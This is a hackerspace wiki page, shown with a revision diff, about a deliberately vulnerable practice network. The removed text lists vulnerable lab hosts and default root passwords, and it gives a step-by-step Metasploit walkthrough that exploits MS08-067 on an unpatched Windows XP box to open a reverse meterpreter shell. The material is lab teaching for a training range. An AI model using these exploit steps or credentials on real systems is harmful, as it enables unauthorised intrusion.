Warzone

From Interlock Rochester Wiki

(Difference between revisions)
Jump to: navigation, search
(Etiquette)
Line 1: Line 1:
[[image:warzonelogo.png|center]]
[[image:warzonelogo.png|center]]
 +
'''UPDATE --[[User:Antitree|Antitree]] 13:14, 8 February 2012 (EST): Warzon decommissioned for now.'''
The warzone is a playground for security hackers.  When joining this network you should assume that you will be attacked by other people on the network or the network itself.  For those interested, there are systems set up that are designed to be exploited in different ways.
The warzone is a playground for security hackers.  When joining this network you should assume that you will be attacked by other people on the network or the network itself.  For those interested, there are systems set up that are designed to be exploited in different ways.
-
Feel free to poke around the network, setup your own boxes and services, make a honeypot, pop a box, or just watch the traffic. 
 
[[image:warzone.png|center|800px]]
[[image:warzone.png|center|800px]]
Line 14: Line 14:
* '''You break it, you bought it''':  If you are hacking away and the system or service becomes unresponsive, please do your best to bring it back up.  If all else fails, talk to [[user:antitree|antitree]].
* '''You break it, you bought it''':  If you are hacking away and the system or service becomes unresponsive, please do your best to bring it back up.  If all else fails, talk to [[user:antitree|antitree]].
* '''Take off your whitehat''': Please don't break in and fix a hole for someone else.  The network is designed for all skill levels and we'd like to keep even the simple vulnerabilities open. That being said, if you notice a hole in a member's PoB (personally owned box) it would be nice if you told them.
* '''Take off your whitehat''': Please don't break in and fix a hole for someone else.  The network is designed for all skill levels and we'd like to keep even the simple vulnerabilities open. That being said, if you notice a hole in a member's PoB (personally owned box) it would be nice if you told them.
-
 
-
== How to join ==
 
-
Two options:
 
-
# join the wireless network with the ESSID "warzone" "AAAAAAAAAA I don't know the password!" You'll figure it out
 
-
# connect your system into any of the bottom two network jacks around the space
 
-
 
-
== On the network ==
 
-
=== Vulnerable Hosts ===
 
-
==== Damn Vulnerable Linux  00:0C:29:A6:83:1D====
 
-
http://www.damnvulnerablelinux.org
 
-
 
-
Designed to be a fully functioning Linux server with misconfigured/exploitable services.  Can you find which ones? 
 
-
 
-
==== De-ICE 100 00:0C:29:C0:6A:A4 ====
 
-
http://www.de-ice.net
 
-
 
-
De-ICE 100 is the first of a set of incrementally challenging vulnerable LiveCD's. 100 starts you out with the same kind of services as DVL.  Check out their website for the storyline that goes along with it. 
 
-
 
-
==== De-ICE 110 00:0C:29:C8:8E:3A ====
 
-
http://www.de-ice.net
 
-
 
-
De-ICE 110 is the second level of the vulnerable de-ice series of vulnerable LiveCD's.  Check the website for the story line that goes along with this server. 
 
-
 
-
==== Windows XP SP2 00:0C:29:B1:0F:1C ====
 
-
home brew
 
-
 
-
This is a standard windows XP image based on the images from the FDCC project.  It was originally designed from the Metasploit Unleashed training servers.  There is nothing particularly special about this but it is an unpatched system running some extra services.  Some of us have already started to make a tagging board for fun. 
 
-
 
-
==== Damn Vulnerable Web App 00:0C:29:C8:8E:3A ====
 
-
http://sourceforge.net/projects/dvwa/
 
-
 
-
Created by OWASP, DVWA attempts to be a simple web service that was horribly designed.  XSS, SQLi, Remote file inclusion are just a few of the problems.
 
-
 
-
==== BadStore 123 00:14:22:0b:4a:3e ====
 
-
http://www.badstore.net/downloads/BadStore_net_v1_2_Manual.pdf?n=52
 
-
 
-
=== Service Providers ===
 
-
Not designed to be hacked but for setting up or providing test services. 
 
-
 
-
==== ESX 4.0 ====
 
-
Vmware ESX provides most of the systems that are available on the network
 
-
 
-
192.168.1.10
 
-
 
-
==== Asterisk ====
 
-
http://www.asterisk.org/
 
-
 
-
This is not a designed to be vulnerable distribution but rather a VOIP system for testing vulnerabilities in this type of server.
 
-
 
-
Login: root/rochesterhackers
 
-
 
-
==== Backtrack 4 Final ====
 
-
http://www.backtrack-linux.org
 
-
 
-
Not designed to be a vulnerable system but it does have all the tools you'll need to exploit the rest of the network.  Log in with SSH and use it to pivot through the rest of the network. Username is root and password is toor.  All settings are persistent between reboots.
 
-
 
-
== Your first Metasploit Reverse Shell ==
 
-
Steps to hack your first system:
 
-
* ssh into the backtrack box (usually 192.168.1.202)
 
-
* username root password toor
 
-
* run a ping sweep of the network
 
-
nmap -sP 192.168.1.0/24
 
-
* review the IPs and find where the windows XP box is hiding
 
-
* start metasploit
 
-
/pentest/exploits/framework3/msfconsole
 
-
[[image:warzone1.png|thumb]]
 
-
* at the console use the MS08_067 Netapi exploit
 
-
msf > use exploit/windows/smb/ms08_067_netapi
 
-
* type show options to see what values are needed
 
-
* set the remote host to the IP address you found above
 
-
msf > set RHOST 192.168.1.200
 
-
* change the default port from 445 to 139
 
-
msf > set RPORT 139
 
-
[[image:warzone2.png|thumb]]
 
-
* set the payload to the reverse meterpreter shell
 
-
msf > set PAYLOAD windows/meterpreter/reverse_tcp
 
-
* set the local host of backtrack's IP so the shell knows where to connect back to
 
-
msf > set LHOST 192.168.1.202
 
-
* attack!
 
-
msf > exploit
 
-
 
-
If you have everything correct, you should get a meterpreter prompt.  Now what can you do??....
 
-
 
-
== Next Steps ==
 
-
* add an onion topology - make multiple layers of the network and have some boxes bridge between the other networks. Attackers have to break into one system to get to the next network. 
 
-
* Setup standard backups using a virtual appliance
 
-
* Add more systems from this resource: http://sourceforge.net/projects/virtualhacking/files/
 

Revision as of 18:14, 8 February 2012

Warzonelogo.png

UPDATE --Antitree 13:14, 8 February 2012 (EST): Warzon decommissioned for now.

The warzone is a playground for security hackers. When joining this network you should assume that you will be attacked by other people on the network or the network itself. For those interested, there are systems set up that are designed to be exploited in different ways.


Warzone.png

Rules

None

Etiquette

  • DOS is for newbs: Denial of service attacks are always possible with this setup. Intentional simple denial of service attacks (like ARP poisoning to nowhere or crashing switches) will be met with frowny faces and "pfffs" from your fellow members.
  • You break it, you bought it: If you are hacking away and the system or service becomes unresponsive, please do your best to bring it back up. If all else fails, talk to antitree.
  • Take off your whitehat: Please don't break in and fix a hole for someone else. The network is designed for all skill levels and we'd like to keep even the simple vulnerabilities open. That being said, if you notice a hole in a member's PoB (personally owned box) it would be nice if you told them.
Retrieved from "http://www.interlockroc.org/wiki/index.php/Warzone"
Personal tools